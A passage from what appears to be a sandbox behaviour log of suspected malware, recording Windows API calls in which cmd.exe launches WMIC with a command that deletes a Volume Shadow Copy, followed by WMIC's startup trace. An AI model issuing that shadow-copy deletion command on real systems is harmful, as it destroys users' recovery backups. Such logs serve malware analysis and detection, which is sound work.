cAlternateFileName="5P5NRG~1")) returned 0x28b870 [0103.525] FindClose (in: hFindFile=0x28b870 | out: hFindFile=0x28b870) returned 1 [0103.525] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0103.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f420 | out: lpFindFileData=0x18f420*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x28b870 [0103.525] FindClose (in: hFindFile=0x28b870 | out: hFindFile=0x28b870) returned 1 [0103.525] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0103.525] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0103.525] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.525] GetProcessHeap () returned 0x270000 [0103.525] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ad60 | out: hHeap=0x270000) returned 1 [0103.525] GetEnvironmentStringsW () returned 0x28b870* [0103.526] GetProcessHeap () returned 0x270000 [0103.526] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xae8) returned 0x28c360 [0103.526] FreeEnvironmentStringsW (penv=0x28b870) returned 1 [0103.526] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d9c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0103.526] GetProcessHeap () returned 0x270000 [0103.526] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b800 | out: hHeap=0x270000) returned 1 [0103.526] GetProcessHeap () returned 0x270000 [0103.526] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4016) returned 0x28ce50 [0103.526] GetProcessHeap () returned 0x270000 [0103.526] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe4) returned 0x289680 [0103.526] GetProcessHeap () returned 0x270000 [0103.526] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce50 | out: hHeap=0x270000) returned 1 [0103.526] GetConsoleOutputCP () returned 0x1b5 [0103.527] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d9bfe0 | out: lpCPInfo=0x49d9bfe0) returned 1 [0103.527] GetUserDefaultLCID () returned 0x409 [0103.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49d97b50, cchData=8 | out: lpLCData=":") returned 2 [0103.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f820, cchData=128 | out: lpLCData="0") returned 2 [0103.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f820, cchData=128 | out: lpLCData="0") returned 2 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f820, cchData=128 | out: lpLCData="1") returned 2 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49daa740, cchData=8 | out: lpLCData="/") returned 2 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49daa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49daa460, cchData=32 | out: lpLCData="Tue") returned 4 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49daa420, cchData=32 | out: lpLCData="Wed") returned 4 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49daa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49daa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49daa360, cchData=32 | out: lpLCData="Sat") returned 4 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49daa700, cchData=32 | out: lpLCData="Sun") returned 4 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49d97b40, cchData=8 | out: lpLCData=".") returned 2 [0103.528] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49daa4e0, cchData=8 | out: lpLCData=",") returned 2 [0103.528] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0103.529] GetProcessHeap () returned 0x270000 [0103.529] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20c) returned 0x2897e0 [0103.529] GetConsoleTitleW (in: lpConsoleTitle=0x2897e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0103.529] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0103.529] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0103.529] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0103.530] GetProcessHeap () returned 0x270000 [0103.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4012) returned 0x28ce50 [0103.530] GetProcessHeap () returned 0x270000 [0103.530] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce50 | out: hHeap=0x270000) returned 1 [0103.532] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0103.532] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0103.532] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0103.532] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0103.532] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0103.533] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0103.533] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0103.533] GetProcessHeap () returned 0x270000 [0103.533] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0) returned 0x289a00 [0103.533] GetProcessHeap () returned 0x270000 [0103.533] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x54) returned 0x289ac0 [0103.535] GetProcessHeap () returned 0x270000 [0103.535] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x9e) returned 0x289b20 [0103.536] GetConsoleTitleW (in: lpConsoleTitle=0x18f730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.537] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.537] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f2c0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f2a0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f2a0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.537] GetProcessHeap () returned 0x270000 [0103.537] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x218) returned 0x289bd0 [0103.537] GetProcessHeap () returned 0x270000 [0103.537] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe2) returned 0x289df0 [0103.537] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0103.537] GetProcessHeap () returned 0x270000 [0103.538] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x420) returned 0x271320 [0103.538] SetErrorMode (uMode=0x0) returned 0x8001 [0103.538] SetErrorMode (uMode=0x1) returned 0x0 [0103.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x271330, lpFilePart=0x18efc0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x18efc0*="wbem") returned 0x18 [0103.538] SetErrorMode (uMode=0x8001) returned 0x1 [0103.538] GetProcessHeap () returned 0x270000 [0103.538] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x271320, Size=0x54) returned 0x271320 [0103.538] GetProcessHeap () returned 0x270000 [0103.538] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x271320) returned 0x54 [0103.538] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0103.538] GetProcessHeap () returned 0x270000 [0103.538] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x289ee0 [0103.538] GetProcessHeap () returned 0x270000 [0103.538] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x7c) returned 0x289f30 [0103.538] GetProcessHeap () returned 0x270000 [0103.538] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x289f30, Size=0x48) returned 0x289f30 [0103.538] GetProcessHeap () returned 0x270000 [0103.538] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x289f30) returned 0x48 [0103.538] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d8f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0103.539] GetProcessHeap () returned 0x270000 [0103.539] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe8) returned 0x289f90 [0103.543] GetProcessHeap () returned 0x270000 [0103.543] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x289f90, Size=0x7e) returned 0x289f90 [0103.543] GetProcessHeap () returned 0x270000 [0103.543] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x289f90) returned 0x7e [0103.544] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x18ed30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed30) returned 0x28a020 [0103.544] GetProcessHeap () returned 0x270000 [0103.544] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x28) returned 0x2846c0 [0103.544] FindClose (in: hFindFile=0x28a020 | out: hFindFile=0x28a020) returned 1 [0103.544] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0103.544] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0103.544] GetConsoleTitleW (in: lpConsoleTitle=0x18f280, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.545] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f038, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18eff8 | out: lpAttributeList=0x18f038, lpSize=0x18eff8) returned 1 [0103.545] UpdateProcThreadAttribute (in: lpAttributeList=0x18f038, dwFlags=0x0, Attribute=0x60001, lpValue=0x18efe8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f038, lpPreviousValue=0x0) returned 1 [0103.545] GetStartupInfoW (in: lpStartupInfo=0x18f150 | out: lpStartupInfo=0x18f150*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0103.545] GetProcessHeap () returned 0x270000 [0103.545] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x20) returned 0x2846f0 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0103.546] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0103.546] GetProcessHeap () returned 0x270000 [0103.546] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2846f0 | out: hHeap=0x270000) returned 1 [0103.546] GetProcessHeap () returned 0x270000 [0103.546] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12) returned 0x288a30 [0103.546] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0103.547] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18f070*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f020 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete", lpProcessInformation=0x18f020*(hProcess=0x54, hThread=0x50, dwProcessId=0xa08, dwThreadId=0xa0c)) returned 1 [0103.554] CloseHandle (hObject=0x50) returned 1 [0103.554] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0103.554] GetProcessHeap () returned 0x270000 [0103.554] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28c360 | out: hHeap=0x270000) returned 1 [0103.554] GetEnvironmentStringsW () returned 0x28ad60* [0103.554] GetProcessHeap () returned 0x270000 [0103.554] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xae8) returned 0x28b850 [0103.554] FreeEnvironmentStringsW (penv=0x28ad60) returned 1 [0103.554] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0105.156] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18ef68 | out: lpExitCode=0x18ef68*=0x0) returned 1 [0105.157] CloseHandle (hObject=0x54) returned 1 [0105.157] _vsnwprintf (in: _Buffer=0x18f1d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ef78 | out: _Buffer="00000000") returned 8 [0105.157] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0105.157] GetProcessHeap () returned 0x270000 [0105.157] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b850 | out: hHeap=0x270000) returned 1 [0105.157] GetEnvironmentStringsW () returned 0x28ad60* [0105.157] GetProcessHeap () returned 0x270000 [0105.157] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0e) returned 0x28b880 [0105.157] FreeEnvironmentStringsW (penv=0x28ad60) returned 1 [0105.157] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0105.157] GetProcessHeap () returned 0x270000 [0105.157] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b880 | out: hHeap=0x270000) returned 1 [0105.157] GetEnvironmentStringsW () returned 0x28ad60* [0105.157] GetProcessHeap () returned 0x270000 [0105.157] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0e) returned 0x28b880 [0105.157] FreeEnvironmentStringsW (penv=0x28ad60) returned 1 [0105.157] GetProcessHeap () returned 0x270000 [0105.157] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x288a30 | out: hHeap=0x270000) returned 1 [0105.157] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f038 | out: lpAttributeList=0x18f038) [0105.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0105.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d8e194 | out: lpMode=0x49d8e194) returned 1 [0105.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d8e198 | out: lpMode=0x49d8e198) returned 1 [0105.158] SetConsoleInputExeNameW () returned 0x1 [0105.158] GetConsoleOutputCP () returned 0x1b5 [0105.158] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d9bfe0 | out: lpCPInfo=0x49d9bfe0) returned 1 [0105.158] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.158] exit (_Code=0) Process: id = "29" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0xca90000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0x544" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 179 os_tid = 0xa0c [0103.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f8d0 | out: lpSystemTimeAsFileTime=0x22f8d0*(dwLowDateTime=0x45534e10, dwHighDateTime=0x1d68245)) [0103.599] GetCurrentProcessId () returned 0xa08 [0103.599] GetCurrentThreadId () returned 0xa0c [0103.599] GetTickCount () returned 0x114f94d [0103.599] QueryPerformanceCounter (in: lpPerformanceCount=0x22f8d8 | out: lpPerformanceCount=0x22f8d8*=22349178993) returned 1 [0103.602] GetModuleHandleW (lpModuleName=0x0) returned 0xff3c0000 [0103.603] __set_app_type (_Type=0x1) [0103.603] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff40ced0) returned 0x0 [0103.603] __wgetmainargs (in: _Argc=0xff432380, _Argv=0xff432390, _Env=0xff432388, _DoWildCard=0, _StartInfo=0xff43239c | out: _Argc=0xff432380, _Argv=0xff432390, _Env=0xff432388) returned 0 [0103.603] ??0CHString@@QEAA@XZ () returned 0xff432ab0 [0103.603] malloc (_Size=0x30) returned 0x155a50 [0103.603] malloc (_Size=0x70) returned 0x155a90 [0103.604] malloc (_Size=0x50) returned 0x157d30 [0103.604] malloc (_Size=0x30) returned 0x157d90 [0103.604] malloc (_Size=0x48) returned 0x157dd0 [0103.604] malloc (_Size=0x30) returned 0x157e20 [0103.604] malloc (_Size=0x30) returned 0x157e60 [0103.604] ??0CHString@@QEAA@XZ () returned 0xff432f58 [0103.604] malloc (_Size=0x30) returned 0x157ea0 [0103.604] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0103.604] SetConsoleCtrlHandler (HandlerRoutine=0xff405724, Add=1) returned 1 [0103.604] _onexit (_Func=0xff41f378) returned 0xff41f378 [0103.604] _onexit (_Func=0xff41f490) returned 0xff41f490 [0103.604] _onexit (_Func=0xff41f4d0) returned 0xff41f4d0 [0103.605] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.606] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0103.609] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0103.616] CoCreateInstance (in: rclsid=0xff3c73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3c7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff432940 | out: ppv=0xff432940*=0x1ea1390) returned 0x0 [0103.624] GetCurrentProcess () returned 0xffffffffffffffff [0103.624] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x22f6a0 | out: TokenHandle=0x22f6a0*=0xf4) returned 1 [0103.624] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22f698 | out: TokenInformation=0x0, ReturnLength=0x22f698) returned 0 [0103.624] malloc (_Size=0x118) returned 0x1569a0 [0103.625] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x1569a0, TokenInformationLength=0x118, ReturnLength=0x22f698 | out: TokenInformation=0x1569a0, ReturnLength=0x22f698) returned 1 [0103.625] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x1569a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=2070947786, Attributes=0xb9f6), (Luid.LowPart=0x0, Luid.HighPart=1408736, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0103.625] free (_Block=0x1569a0) [0103.625] CloseHandle (hObject=0xf4) returned 1 [0103.625] malloc (_Size=0x40) returned 0x157ee0 [0103.625] malloc (_Size=0x40) returned 0x157f30 [0103.625] malloc (_Size=0x40) returned 0x157f80 [0103.625] malloc (_Size=0x20a) returned 0x1569a0 [0103.625] GetSystemDirectoryW (in: lpBuffer=0x1569a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.625] free (_Block=0x1569a0) [0103.625] malloc (_Size=0x18) returned 0x3fdfb0 [0103.625] malloc (_Size=0x18) returned 0x1569a0 [0103.625] malloc (_Size=0x18) returned 0x1569c0 [0103.625] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0103.625] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0103.626] free (_Block=0x3fdfb0) [0103.626] free (_Block=0x1569a0) [0103.626] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0103.626] GetProcAddress 